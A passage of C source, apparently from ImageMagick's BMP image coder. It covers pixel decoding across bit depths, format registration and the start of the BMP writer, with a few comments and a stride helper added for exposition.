if (count != (ssize_t) (packet_size*image->colors))
ThrowReaderException(CorruptImageError,"InsufficientImageDataInFile");
p=bmp_colormap;
for (i=0; i < (ssize_t) image->colors; i++)
{
image->colormap[i].blue=(MagickRealType) ScaleCharToQuantum(*p++);
image->colormap[i].green=(MagickRealType) ScaleCharToQuantum(*p++);
image->colormap[i].red=(MagickRealType) ScaleCharToQuantum(*p++);
if (packet_size == 4)
p++;
}
bmp_colormap=(unsigned char *) RelinquishMagickMemory(bmp_colormap);
}
image->resolution.x=(double) bmp_info.x_pixels/100.0;
image->resolution.y=(double) bmp_info.y_pixels/100.0;
image->units=PixelsPerCentimeterResolution;
if ((image_info->ping != MagickFalse) && (image_info->number_scenes != 0))
if (image->scene >= (image_info->scene+image_info->number_scenes-1))
break;
status=SetImageExtent(image,image->columns,image->rows,exception);
if (status == MagickFalse)
return(DestroyImageList(image));
/*
Read image data.
*/
offset=SeekBlob(image,start_position+bmp_info.offset_bits,SEEK_SET);
if (offset < 0)
ThrowReaderException(CorruptImageError,"ImproperImageHeader");
if (bmp_info.compression == BI_RLE4)
bmp_info.bits_per_pixel<<=1;
bytes_per_line=4*((image->columns*bmp_info.bits_per_pixel+31)/32);
length=(size_t) bytes_per_line*image->rows;
pixel_info=AcquireVirtualMemory((size_t) image->rows,
MagickMax(bytes_per_line,image->columns+256UL)*sizeof(*pixels));
if (pixel_info == (MemoryInfo *) NULL)
ThrowReaderException(ResourceLimitError,"MemoryAllocationFailed");
pixels=(unsigned char *) GetVirtualMemoryBlob(pixel_info);
if ((bmp_info.compression == BI_RGB) ||
(bmp_info.compression == BI_BITFIELDS))
{
if (image->debug != MagickFalse)
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Reading pixels (%.20g bytes)",(double) length);
count=ReadBlob(image,length,pixels);
if (count != (ssize_t) length)
{
pixel_info=RelinquishVirtualMemory(pixel_info);
ThrowReaderException(CorruptImageError,
"InsufficientImageDataInFile");
}
}
else
{
/*
Convert run-length encoded raster pixels.
*/
status=DecodeImage(image,bmp_info.compression,pixels);
if (status == MagickFalse)
{
pixel_info=RelinquishVirtualMemory(pixel_info);
ThrowReaderException(CorruptImageError,
"UnableToRunlengthDecodeImage");
}
}
/*
Convert BMP raster image to pixel packets.
*/
if (bmp_info.compression == BI_RGB)
{
/*
We should ignore the alpha value in BMP3 files, but there have been
reports of 32-bit files with alpha. We do a quick check to see if
the alpha channel contains a value that is not zero (the default).
If we find a non-zero value, we assume the program that wrote the
file wants to use the alpha channel.
*/
if ((image->alpha_trait == UndefinedPixelTrait) && (bmp_info.size == 40) &&
(bmp_info.bits_per_pixel == 32))
{
bytes_per_line=4*(image->columns);
for (y=(ssize_t) image->rows-1; y >= 0; y--)
{
p=pixels+(image->rows-y-1)*bytes_per_line;
for (x=0; x < (ssize_t) image->columns; x++)
{
if (*(p+3) != 0)
{
image->alpha_trait=BlendPixelTrait;
y=-1;
break;
}
p+=4;
}
}
}
bmp_info.alpha_mask=image->alpha_trait != UndefinedPixelTrait ?
0xff000000U : 0U;
bmp_info.red_mask=0x00ff0000U;
bmp_info.green_mask=0x0000ff00U;
bmp_info.blue_mask=0x000000ffU;
if (bmp_info.bits_per_pixel == 16)
{
/*
RGB555.
*/
bmp_info.red_mask=0x00007c00U;
bmp_info.green_mask=0x000003e0U;
bmp_info.blue_mask=0x0000001fU;
}
}
(void) ResetMagickMemory(&shift,0,sizeof(shift));
(void) ResetMagickMemory(&quantum_bits,0,sizeof(quantum_bits));
if ((bmp_info.bits_per_pixel == 16) || (bmp_info.bits_per_pixel == 32))
{
register size_t
sample;
/*
Get shift and quantum bits info from bitfield masks.
*/
if (bmp_info.red_mask != 0)
while (((bmp_info.red_mask << shift.red) & 0x80000000UL) == 0)
shift.red++;
if (bmp_info.green_mask != 0)
while (((bmp_info.green_mask << shift.green) & 0x80000000UL) == 0)
shift.green++;
if (bmp_info.blue_mask != 0)
while (((bmp_info.blue_mask << shift.blue) & 0x80000000UL) == 0)
shift.blue++;
if (bmp_info.alpha_mask != 0)
while (((bmp_info.alpha_mask << shift.alpha) & 0x80000000UL) == 0)
shift.alpha++;
sample=shift.red;
while (((bmp_info.red_mask << sample) & 0x80000000UL) != 0)
sample++;
quantum_bits.red=(MagickRealType) (sample-shift.red);
sample=shift.green;
while (((bmp_info.green_mask << sample) & 0x80000000UL) != 0)
sample++;
quantum_bits.green=(MagickRealType) (sample-shift.green);
sample=shift.blue;
while (((bmp_info.blue_mask << sample) & 0x80000000UL) != 0)
sample++;
quantum_bits.blue=(MagickRealType) (sample-shift.blue);
sample=shift.alpha;
while (((bmp_info.alpha_mask << sample) & 0x80000000UL) != 0)
sample++;
quantum_bits.alpha=(MagickRealType) (sample-shift.alpha);
}
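/*
Worked example (added for exposition): for the RGB555 masks assigned
above, red_mask is 0x00007c00; seventeen left shifts move its top bit
to 0x80000000, so shift.red becomes 17, and five further shifts exhaust
the mask, so quantum_bits.red becomes 5. The scanline loops below then
replicate high-order bits (e.g. red|=((red & 0xe000) >> 5)) to widen
the 5-bit samples toward 16 bits.
*/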
switch (bmp_info.bits_per_pixel)
{
case 1:
{
/*
Convert bitmap scanline.
*/
for (y=(ssize_t) image->rows-1; y >= 0; y--)
{
p=pixels+(image->rows-y-1)*bytes_per_line;
q=QueueAuthenticPixels(image,0,y,image->columns,1,exception);
if (q == (Quantum *) NULL)
break;
for (x=0; x < ((ssize_t) image->columns-7); x+=8)
{
for (bit=0; bit < 8; bit++)
{
index=(Quantum) (((*p) & (0x80 >> bit)) != 0 ? 0x01 : 0x00);
SetPixelIndex(image,index,q);
q+=GetPixelChannels(image);
}
p++;
}
if ((image->columns % 8) != 0)
{
for (bit=0; bit < (image->columns % 8); bit++)
{
index=(Quantum) (((*p) & (0x80 >> bit)) != 0 ? 0x01 : 0x00);
SetPixelIndex(image,index,q);
q+=GetPixelChannels(image);
}
p++;
}
if (SyncAuthenticPixels(image,exception) == MagickFalse)
break;
if (image->previous == (Image *) NULL)
{
status=SetImageProgress(image,LoadImageTag,(MagickOffsetType)
(image->rows-y),image->rows);
if (status == MagickFalse)
break;
}
}
(void) SyncImage(image,exception);
break;
}
case 4:
{
/*
Convert PseudoColor scanline.
*/
for (y=(ssize_t) image->rows-1; y >= 0; y--)
{
p=pixels+(image->rows-y-1)*bytes_per_line;
q=QueueAuthenticPixels(image,0,y,image->columns,1,exception);
if (q == (Quantum *) NULL)
break;
for (x=0; x < ((ssize_t) image->columns-1); x+=2)
{
ValidateColormapValue(image,(*p >> 4) & 0x0f,&index,exception);
SetPixelIndex(image,index,q);
q+=GetPixelChannels(image);
ValidateColormapValue(image,*p & 0x0f,&index,exception);
SetPixelIndex(image,index,q);
q+=GetPixelChannels(image);
p++;
}
if ((image->columns % 2) != 0)
{
ValidateColormapValue(image,(*p >> 4) & 0xf,&index,exception);
SetPixelIndex(image,index,q);
q+=GetPixelChannels(image);
p++;
x++;
}
if (x < (ssize_t) image->columns)
break;
if (SyncAuthenticPixels(image,exception) == MagickFalse)
break;
if (image->previous == (Image *) NULL)
{
status=SetImageProgress(image,LoadImageTag,(MagickOffsetType)
(image->rows-y),image->rows);
if (status == MagickFalse)
break;
}
}
(void) SyncImage(image,exception);
break;
}
case 8:
{
/*
Convert PseudoColor scanline.
*/
if ((bmp_info.compression == BI_RLE8) ||
(bmp_info.compression == BI_RLE4))
bytes_per_line=image->columns;
for (y=(ssize_t) image->rows-1; y >= 0; y--)
{
p=pixels+(image->rows-y-1)*bytes_per_line;
q=QueueAuthenticPixels(image,0,y,image->columns,1,exception);
if (q == (Quantum *) NULL)
break;
for (x=(ssize_t) image->columns; x != 0; --x)
{
ValidateColormapValue(image,*p++,&index,exception);
SetPixelIndex(image,index,q);
q+=GetPixelChannels(image);
}
if (x > 0)
break;
if (SyncAuthenticPixels(image,exception) == MagickFalse)
break;
offset=(MagickOffsetType) (image->rows-y-1);
if (image->previous == (Image *) NULL)
{
status=SetImageProgress(image,LoadImageTag,(MagickOffsetType)
(image->rows-y),image->rows);
if (status == MagickFalse)
break;
}
}
(void) SyncImage(image,exception);
break;
}
case 16:
{
size_t
alpha,
pixel;
/*
Convert bitfield encoded 16-bit DirectColor scanline.
*/
if (bmp_info.compression != BI_RGB &&
bmp_info.compression != BI_BITFIELDS)
{
pixel_info=RelinquishVirtualMemory(pixel_info);
ThrowReaderException(CorruptImageError,
"UnrecognizedImageCompression");
}
bytes_per_line=2*(image->columns+image->columns % 2);
image->storage_class=DirectClass;
for (y=(ssize_t) image->rows-1; y >= 0; y--)
{
p=pixels+(image->rows-y-1)*bytes_per_line;
q=QueueAuthenticPixels(image,0,y,image->columns,1,exception);
if (q == (Quantum *) NULL)
break;
for (x=0; x < (ssize_t) image->columns; x++)
{
pixel=(size_t) (*p++);
pixel|=(*p++) << 8;
red=((pixel & bmp_info.red_mask) << shift.red) >> 16;
if (quantum_bits.red == 5)
red|=((red & 0xe000) >> 5);
if (quantum_bits.red <= 8)
red|=((red & 0xff00) >> 8);
green=((pixel & bmp_info.green_mask) << shift.green) >> 16;
if (quantum_bits.green == 5)
green|=((green & 0xe000) >> 5);
if (quantum_bits.green == 6)
green|=((green & 0xc000) >> 6);
if (quantum_bits.green <= 8)
green|=((green & 0xff00) >> 8);
blue=((pixel & bmp_info.blue_mask) << shift.blue) >> 16;
if (quantum_bits.blue == 5)
blue|=((blue & 0xe000) >> 5);
if (quantum_bits.blue <= 8)
blue|=((blue & 0xff00) >> 8);
SetPixelRed(image,ScaleShortToQuantum((unsigned short) red),q);
SetPixelGreen(image,ScaleShortToQuantum((unsigned short) green),q);
SetPixelBlue(image,ScaleShortToQuantum((unsigned short) blue),q);
SetPixelAlpha(image,OpaqueAlpha,q);
if (image->alpha_trait != UndefinedPixelTrait)
{
alpha=((pixel & bmp_info.alpha_mask) << shift.alpha) >> 16;
if (quantum_bits.alpha <= 8)
alpha|=((alpha & 0xff00) >> 8);
SetPixelAlpha(image,ScaleShortToQuantum(
(unsigned short) alpha),q);
}
q+=GetPixelChannels(image);
}
if (SyncAuthenticPixels(image,exception) == MagickFalse)
break;
offset=(MagickOffsetType) (image->rows-y-1);
if (image->previous == (Image *) NULL)
{
status=SetImageProgress(image,LoadImageTag,(MagickOffsetType)
(image->rows-y),image->rows);
if (status == MagickFalse)
break;
}
}
break;
}
case 24:
{
/*
Convert DirectColor scanline.
*/
bytes_per_line=4*((image->columns*24+31)/32);
for (y=(ssize_t) image->rows-1; y >= 0; y--)
{
p=pixels+(image->rows-y-1)*bytes_per_line;
q=QueueAuthenticPixels(image,0,y,image->columns,1,exception);
if (q == (Quantum *) NULL)
break;
for (x=0; x < (ssize_t) image->columns; x++)
{
SetPixelBlue(image,ScaleCharToQuantum(*p++),q);
SetPixelGreen(image,ScaleCharToQuantum(*p++),q);
SetPixelRed(image,ScaleCharToQuantum(*p++),q);
SetPixelAlpha(image,OpaqueAlpha,q);
q+=GetPixelChannels(image);
}
if (SyncAuthenticPixels(image,exception) == MagickFalse)
break;
offset=(MagickOffsetType) (image->rows-y-1);
if (image->previous == (Image *) NULL)
{
status=SetImageProgress(image,LoadImageTag,(MagickOffsetType)
(image->rows-y),image->rows);
if (status == MagickFalse)
break;
}
}
break;
}
case 32:
{
/*
Convert bitfield encoded DirectColor scanline.
*/
if ((bmp_info.compression != BI_RGB) &&
(bmp_info.compression != BI_BITFIELDS))
{
pixel_info=RelinquishVirtualMemory(pixel_info);
ThrowReaderException(CorruptImageError,
"UnrecognizedImageCompression");
}
bytes_per_line=4*(image->columns);
for (y=(ssize_t) image->rows-1; y >= 0; y--)
{
size_t
alpha,
pixel;
p=pixels+(image->rows-y-1)*bytes_per_line;
q=QueueAuthenticPixels(image,0,y,image->columns,1,exception);
if (q == (Quantum *) NULL)
break;
for (x=0; x < (ssize_t) image->columns; x++)
{
pixel=(size_t) (*p++);
pixel|=((size_t) *p++ << 8);
pixel|=((size_t) *p++ << 16);
pixel|=((size_t) *p++ << 24);
red=((pixel & bmp_info.red_mask) << shift.red) >> 16;
if (quantum_bits.red == 8)
red|=(red >> 8);
green=((pixel & bmp_info.green_mask) << shift.green) >> 16;
if (quantum_bits.green == 8)
green|=(green >> 8);
blue=((pixel & bmp_info.blue_mask) << shift.blue) >> 16;
if (quantum_bits.blue == 8)
blue|=(blue >> 8);
SetPixelRed(image,ScaleShortToQuantum((unsigned short) red),q);
SetPixelGreen(image,ScaleShortToQuantum((unsigned short) green),q);
SetPixelBlue(image,ScaleShortToQuantum((unsigned short) blue),q);
SetPixelAlpha(image,OpaqueAlpha,q);
if (image->alpha_trait != UndefinedPixelTrait)
{
alpha=((pixel & bmp_info.alpha_mask) << shift.alpha) >> 16;
if (quantum_bits.alpha == 8)
alpha|=(alpha >> 8);
SetPixelAlpha(image,ScaleShortToQuantum(
(unsigned short) alpha),q);
}
q+=GetPixelChannels(image);
}
if (SyncAuthenticPixels(image,exception) == MagickFalse)
break;
offset=(MagickOffsetType) (image->rows-y-1);
if (image->previous == (Image *) NULL)
{
status=SetImageProgress(image,LoadImageTag,(MagickOffsetType)
(image->rows-y),image->rows);
if (status == MagickFalse)
break;
}
}
break;
}
default:
{
pixel_info=RelinquishVirtualMemory(pixel_info);
ThrowReaderException(CorruptImageError,"ImproperImageHeader");
}
}
pixel_info=RelinquishVirtualMemory(pixel_info);
if (y > 0)
break;
if (EOFBlob(image) != MagickFalse)
{
ThrowFileException(exception,CorruptImageError,"UnexpectedEndOfFile",
image->filename);
break;
}
if (bmp_info.height < 0)
{
Image
*flipped_image;
/*
Correct image orientation.
*/
flipped_image=FlipImage(image,exception);
if (flipped_image != (Image *) NULL)
{
DuplicateBlob(flipped_image,image);
image=DestroyImage(image);
image=flipped_image;
}
}
/*
Proceed to next image.
*/
if (image_info->number_scenes != 0)
if (image->scene >= (image_info->scene+image_info->number_scenes-1))
break;
*magick='\0';
if (bmp_info.ba_offset != 0)
{
offset=SeekBlob(image,(MagickOffsetType) bmp_info.ba_offset,SEEK_SET);
if (offset < 0)
ThrowReaderException(CorruptImageError,"ImproperImageHeader");
}
count=ReadBlob(image,2,magick);
if ((count == 2) && (IsBMP(magick,2) != MagickFalse))
{
/*
Acquire next image structure.
*/
AcquireNextImage(image_info,image,exception);
if (GetNextImageInList(image) == (Image *) NULL)
{
image=DestroyImageList(image);
return((Image *) NULL);
}
image=SyncNextImageInList(image);
status=SetImageProgress(image,LoadImagesTag,TellBlob(image),
GetBlobSize(image));
if (status == MagickFalse)
break;
}
} while (IsBMP(magick,2) != MagickFalse);
(void) CloseBlob(image);
return(GetFirstImageInList(image));
}
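/*
Illustrative sketch added for exposition (not part of the original
coder): the scanline stride used throughout ReadBMPImage(). BMP rows
are padded to a 32-bit boundary, so a 3-pixel wide 24-bit image needs
4*((3*24+31)/32) = 12 bytes per row rather than 9. The function name
is an assumption made for this example only.
*/
static inline size_t BMPScanlineStride(const size_t columns,
  const size_t bits_per_pixel)
{
  return(4*((columns*bits_per_pixel+31)/32));
}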
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% R e g i s t e r B M P I m a g e %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% RegisterBMPImage() adds attributes for the BMP image format to
% the list of supported formats. The attributes include the image format
% tag, a method to read and/or write the format, whether the format
% supports the saving of more than one frame to the same file or blob,
% whether the format supports native in-memory I/O, and a brief
% description of the format.
%
% The format of the RegisterBMPImage method is:
%
% size_t RegisterBMPImage(void)
%
*/
ModuleExport size_t RegisterBMPImage(void)
{
MagickInfo
*entry;
entry=AcquireMagickInfo("BMP","BMP","Microsoft Windows bitmap image");
entry->decoder=(DecodeImageHandler *) ReadBMPImage;
entry->encoder=(EncodeImageHandler *) WriteBMPImage;
entry->magick=(IsImageFormatHandler *) IsBMP;
entry->flags^=CoderAdjoinFlag;
entry->flags|=CoderSeekableStreamFlag;
(void) RegisterMagickInfo(entry);
entry=AcquireMagickInfo("BMP","BMP2","Microsoft Windows bitmap image (V2)");
entry->encoder=(EncodeImageHandler *) WriteBMPImage;
entry->magick=(IsImageFormatHandler *) IsBMP;
entry->flags^=CoderAdjoinFlag;
entry->flags|=CoderSeekableStreamFlag;
(void) RegisterMagickInfo(entry);
entry=AcquireMagickInfo("BMP","BMP3","Microsoft Windows bitmap image (V3)");
entry->encoder=(EncodeImageHandler *) WriteBMPImage;
entry->magick=(IsImageFormatHandler *) IsBMP;
entry->flags^=CoderAdjoinFlag;
entry->flags|=CoderSeekableStreamFlag;
(void) RegisterMagickInfo(entry);
return(MagickImageCoderSignature);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% U n r e g i s t e r B M P I m a g e %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% UnregisterBMPImage() removes format registrations made by the
% BMP module from the list of supported formats.
%
% The format of the UnregisterBMPImage method is:
%
% UnregisterBMPImage(void)
%
*/
ModuleExport void UnregisterBMPImage(void)
{
(void) UnregisterMagickInfo("BMP");
(void) UnregisterMagickInfo("BMP2");
(void) UnregisterMagickInfo("BMP3");
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% W r i t e B M P I m a g e %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% WriteBMPImage() writes an image in Microsoft Windows bitmap encoded
% image format, version 3 for Windows or (if the image has a matte channel)
% version 4.
%
% The format of the WriteBMPImage method is:
%
% MagickBooleanType WriteBMPImage(const ImageInfo *image_info,
% Image *image,ExceptionInfo *exception)
%
% A description of each parameter follows.
%
% o image_info: the image info.
%
% o image: The image.
%
% o exception: return any errors or warnings in this structure.
%
*/
static MagickBooleanType WriteBMPImage(const ImageInfo *image_info,Image *image,
ExceptionInfo *exception)
{
BMPInfo
bmp_info;
const char
*option;
const StringInfo
*profile;
MagickBooleanType
have_color_info,
status;
MagickOffsetType
scene;
MemoryInfo
*pixel_info;
register const Quantum
*p;
register ssize_t
i,
x;
register unsigned char
*q;
size_t
bytes_per_line,
type;
ssize_t
y;
unsigned char
*bmp_data,
*pixels;
/*
Open output image file.
*/
assert(image_info != (const ImageInfo *) NULL);
assert(image_info->signature == MagickCoreSignature);
assert(image != (Image *) NULL);
assert(image->signature == MagickCoreSignature);
if (image->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",image->filename);
assert(exception != (ExceptionInfo *) NULL);
assert(exception->signature == MagickCoreSignature);
status=OpenBlob(image_info,image,WriteBinaryBlobMode,exception);
if (status == MagickFalse)
return(status);
type=4;
if (LocaleCompare(image_info->magick,"BMP2") == 0)
type=2;
else
if (LocaleCompare(image_info->magick,"BMP3") == 0)
type=3;
option=GetImageOption(image_info,"bmp:format");
if (option != (char *) NULL)
{
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Format=%s",option);
if (LocaleCompare(option,"bmp2") == 0)
type=2;
if (LocaleCompare(option,"bmp3") == 0)
type=3;
if (LocaleCompare(option,"bmp4") == 0)
type=4;
}
scene=0;
do
{
/*
Initialize BMP raster file header.
*/
(void) TransformImageColorspace(image,sRGBColorspace,exception);
(void) ResetMagickMemory(&bmp_info,0,sizeof(bmp_info));
bmp_info.file_size=14+12;
if (type > 2)
bmp_info.file_size+=28;
bmp_info.offset_bits=bmp_info.file_size;
bmp_info.compression=BI_RGB;
if ((image->storage_class == PseudoClass) && (image->colors > 256))
(void) SetImageStorageClass(image,DirectClass,exception);
if (image->storage_class != DirectClass)
{
/*
Colormapped BMP raster.
*/
bmp_info.bits_per_pixel=8;
if (image->colors <= 2)
bmp_info.bits_per_pixel=1;
else
if (image->colors <= 16)
bmp_info.bits_per_pixel=4;
else
if (image->colors <= 256)
bmp_info.bits_per_pixel=8;
if (image_info->compression == RLECompression)
bmp_info.bits_per_pixel=8;
bmp_info.number_colors=1U << bmp_info.bits_per_pixel;
if (image->alpha_trait != UndefinedPixelTrait)
(void) SetImageStorageClass(image,DirectClass,exception);
else
if ((size_t) bmp_info.number_colors < image->colors)
(void) SetImageStorageClass(image,DirectClass,exception);
else
{
bmp_info.file_size+=3*(1UL << bmp_info.bits_per_pixel);
bmp_info.offset_bits+=3*(1UL << bmp_info.bits_per_pixel);
if (type > 2)
{
bmp_info.file_size+=(1UL << bmp_info.bits_per_pixel);
bmp_info.offset_bits+=(1UL << bmp_info.bits_per_pixel);
}
}
}
if (image->storage_class == DirectClass)
{
/*
Full color BMP raster.
*/
bmp_info.number_colors=0;
bmp_info.bits_per_pixel=(unsigned short)
((type > 3) && (image->alpha_trait != UndefinedPixelTrait) ? 32 : 24);
bmp_info.compression=(unsigned int) ((type > 3) &&
(image->alpha_trait != UndefinedPixelTrait) ? BI_BITFIELDS : BI_RGB);
if ((type == 3) && (image->alpha_trait != UndefinedPixelTrait))
{
option=GetImageOption(image_info,"bmp3:alpha");
if (IsStringTrue(option))
bmp_info.bits_per_pixel=32;
}
}
bytes_per_line=4*((image->columns*bmp_info.bits_per_pixel+31)/32);
bmp_info.ba_offset=0;
profile=GetImageProfile(image,"icc");
have_color_info=(image->rendering_intent != UndefinedIntent) ||
(profile != (StringInfo *) NULL) || (image->gamma != 0.0) ? MagickTrue :
MagickFalse;
if (type == 2)
bmp_info.size=12;
else
if ((type == 3) || ((image->alpha_trait == UndefinedPixelTrait) &&
(have_color_info == MagickFalse)))
{
type=3;
bmp_info.size=40;
}
else
{
int
extra_size;
bmp_info.size=108;
extra_size=68;
if ((image->rendering_intent != UndefinedIntent) ||
(profile != (StringInfo *) NULL))
{
bmp_info.size=124;
extra_size+=16;
}
bmp_info.file_size+=extra_size;
bmp_info.offset_bits+=extra_size;
}
bmp_info.width=(ssize_t) image->columns;
bmp_info.height=(ssize_t) image->rows;
bmp_info.planes=1;
bmp_info.image_size=(unsigned int) (bytes_per_line*image->rows);
bmp_info.file_size+=bmp_info.image_size;
bmp_info.x_pixels=75*39;
bmp_info.y_pixels=75*39;
switch (image->units)
{
case UndefinedResolution:
case PixelsPerInchResolution:
{
bmp_info.x_pixels=(unsigned int) (100.0*image->resolution.x/2.54);
bmp_info.y_pixels=(unsigned int) (100.0*image->resolution.y/2.54);
break;
}
case PixelsPerCentimeterResolution:
{
bmp_info.x_pixels=(unsigned int) (100.0*image->resolution.x);
bmp_info.y_pixels=(unsigned int) (100.0*image->resolution.y);
break;
}
}
bmp_info.colors_important=bmp_info.number_colors;
/*
Convert MIFF to BMP raster pixels.
*/
pixel_info=AcquireVirtualMemory((size_t) bmp_info.image_size,
sizeof(*pixels));
if (pixel_info == (MemoryInfo *) NULL)
ThrowWriterException(ResourceLimitError,"MemoryAllocationFailed");
pixels=(unsigned char *) GetVirtualMemoryBlob(pixel_info);
(void) ResetMagickMemory(pixels,0,(size_t) bmp_info.image_size);
switch (bmp_info.bits_per_pixel)
{
case 1:
{
size_t
bit,
byte;
/*
Convert PseudoClass image to a BMP monochrome image.
*/
for (y=0; y < (ssize_t) image->rows; y++)
{
ssize_t
offset;
p=GetVirtualPixels(image,0,y,image->columns,1,exception);
if (p == (const Quantum *) NULL)
break;
q=pixels+(image->rows-y-1)*bytes_per_line;
bit=0;
byte=0;
for (x=0; x < (ssize_t) image->columns; x++)
{
byte<<=1;
byte|=GetPixelIndex(image,p) != 0 ? 0x01 : 0x00;
bit++;
if (bit == 8)
{
*q++=(unsigned char) byte;
bit=0;
byte=0;
}
p+=GetPixelChannels(image);
}
if (bit != 0)
{
*q++=(unsigned char) (byte << (8-bit));
x++;
}
offset=(ssize_t) (image->columns+7)/8;
for (x=offset; x < (ssize_t) bytes_per_line; x++)
*q++=0x00;
if (image->previous == (Image *) NULL)
{
status=SetImageProgress(image,SaveImageTag,(MagickOffsetType) y,
image->rows);
if (status == MagickFalse)
break;
}
}
break;
}
case 4:
{
size_t
byte,
nibble;
ssize_t
offset;
/*
Convert PseudoClass image to a 4-bit BMP image.
*/
for (y=0; y < (ssize_t) image->rows; y++)
{
p=GetVirtualPixels(image,0,y,image->columns,1,exception);
if (p == (const Quantum *) NULL)
break;
q=pixels+(image->rows-y-1)*bytes_per_line;
nibble=0;
byte=0;
for (x=0; x < (ssize_t) image->columns; x++)
{
byte<<=4;
byte|=((size_t) GetPixelIndex(image,p) & 0x0f);
nibble++;
if (nibble == 2)
{
*q++=(unsigned char) byte;
nibble=0;
byte=0;
}
p+=GetPixelChannels(image);
}
if (nibble != 0)
{
*q++=(unsigned char) (byte << 4);
x++;
}
offset=(ssize_t) (image->columns+1)/2;
for (x=offset; x < (ssize_t) bytes_per_line; x++)
*q++=0x00;
if (image->previous == (Image *) NULL)
{
status=SetImageProgress(image,SaveImageTag,(MagickOffsetType) y,
image->rows);
if (status == MagickFalse)
break;
}
}
break;
}
case 8:
{
/*
Convert PseudoClass packet to BMP pixel.
*/
for (y=0; y < (ssize_t) image->rows; y++)
{
p=GetVirtualPixels(image,0,y,image->columns,1,exception);
if (p == (const Quantum *) NULL)
break;
q=pixels+(image->rows-y-1)*bytes_per_line;
for (x=0; x < (ssize_t) image->columns; x++)
{
*q++=(unsigned char) GetPixelIndex(image,p);
p+=GetPixelChannels(image);
}
for ( ; x < (ssize_t) bytes_per_line; x++)
*q++=0x00;
if (image->previous == (Image *) NULL)
{
status=SetImageProgress(image,SaveImageTag,(MagickOffsetType) y,
image->rows);
if (status == MagickFalse)
break;
}
}
break;
}
case 24:
{
/*
Convert DirectClass packet to BMP BGR888.
*/
for (y=0; y < (ssize_t) image->rows; y++)
{
p=GetVirtualPixels(image,0,y,image->columns,1,exception);
if (p == (const Quantum *) NULL)
break;
q=pixels+(image->rows-y-1)*bytes_per_line;
for (x=0; x < (ssize_t) image->columns; x++)
{
*q++=ScaleQuantumToChar(GetPixelBlue(image,p));
*q++=ScaleQuantumToChar(GetPixelGreen(image,p));
*q++=ScaleQuantumToChar(GetPixelRed(image,p));
p+=GetPixelChannels(image);
}
for (x=3L*(ssize_t) image->columns; x < (ssize_t) bytes_per_line; x++)
*q++=0x00;
if (image->previous == (Image *) NULL)
{
status=SetImageProgress(image,SaveImageTag,(MagickOffsetType) y,
image->rows);
if (status == MagickFalse)
break;
}
}
break;
}
case 32:
{
/*
Convert DirectClass packet to ARGB8888 pixel.
*/
for (y=0; y < (ssize_t) image->rows; y++)
{
p=GetVirtualPixels(image,0,y,image->columns,1,exception);
if (p == (const Quantum *) NULL)
break;
q=pixels+(image->rows-y-1)*bytes_per_line;
for (x=0; x < (ssize_t) image->columns; x++)
{
*q++=ScaleQuantumToChar(GetPixelBlue(image,p));
*q++=ScaleQuantumToChar(GetPixelGreen(image,p));
*q++=ScaleQuantumToChar(GetPixelRed(image,p));
*q++=ScaleQuantumToChar(GetPixelAlpha(image,p));
p+=GetPixelChannels(image);
}
if (image->previous == (Image *) NULL)
{
status=SetImageProgress(image,SaveImageTag,(MagickOffsetType) y,
image->rows);
if (status == MagickFalse)
break;
}
}
break;
}
}
if ((type > 2) && (bmp_info.bits_per_pixel == 8))
if (image_info->compression != NoCompression)
{
MemoryInfo
*rle_info;
/*
Convert run-length encoded raster pixels.
*/
rle_info=AcquireVirtualMemory((size_t) (2*(bytes_per_line+2)+2),
(image->rows+2)*sizeof(*pixels));
if (rle_info == (MemoryInfo *) NULL)
{
pixel_info=RelinquishVirtualMemory(pixel_info);
ThrowWriterException(ResourceLimitError,"MemoryAllocationFailed");
}
bmp_data=(unsigned char *) GetVirtualMemoryBlob(rle_info);
bmp_info.file_size-=bmp_info.image_size;
bmp_info.image_size=(unsigned int) EncodeImage(image,bytes_per_line,
pixels,bmp_data);
bmp_info.file_size+=bmp_info.image_size;
pixel_info=RelinquishVirtualMemory(pixel_info);
pixel_info=rle_info;
pixels=bmp_data;
bmp_info.compression=BI_RLE8;
}
/*
Write BMP for Windows, all versions, 14-byte header.
*/
if (image->debug != MagickFalse)
{
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Writing BMP version %.20g datastream",(double) type);
if (image->storage_class == DirectClass)
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Storage class=DirectClass");
else
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Storage class=PseudoClass");
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Image depth=%.20g",(double) image->depth);
if (image->alpha_trait != UndefinedPixelTrait)
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Matte=True");
else
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Matte=MagickFalse");
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" BMP bits_per_pixel=%.20g",(double) bmp_info.bits_per_pixel);
switch ((int) bmp_info.compression)
{
case BI_RGB:
{
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Compression=BI_RGB");
break;
}
case BI_RLE8:
{
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Compression=BI_RLE8");
break;
}
case BI_BITFIELDS:
{
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Compression=BI_BITFIELDS");
break;
}
default:
{
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Compression=UNKNOWN (%lu)",bmp_info.compression);
break;
